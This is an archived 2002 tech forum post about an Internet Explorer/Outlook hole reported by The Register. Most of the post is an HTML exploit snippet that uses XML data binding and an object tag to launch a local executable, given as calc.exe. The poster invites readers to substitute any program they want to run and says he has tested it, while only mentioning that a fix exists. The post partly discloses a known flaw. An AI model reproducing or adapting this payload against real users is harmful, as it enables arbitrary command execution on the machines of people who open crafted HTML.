Another IE/Outlook Hole

By lokem
Mar 6, 2002
  1. The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

    Read the rest here:

    The article also has a simple fix for this problem.

    Here's the simple script:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>

    Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
Topic Status:
Not open for further replies.

Similar Topics

Add your comment to this article

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...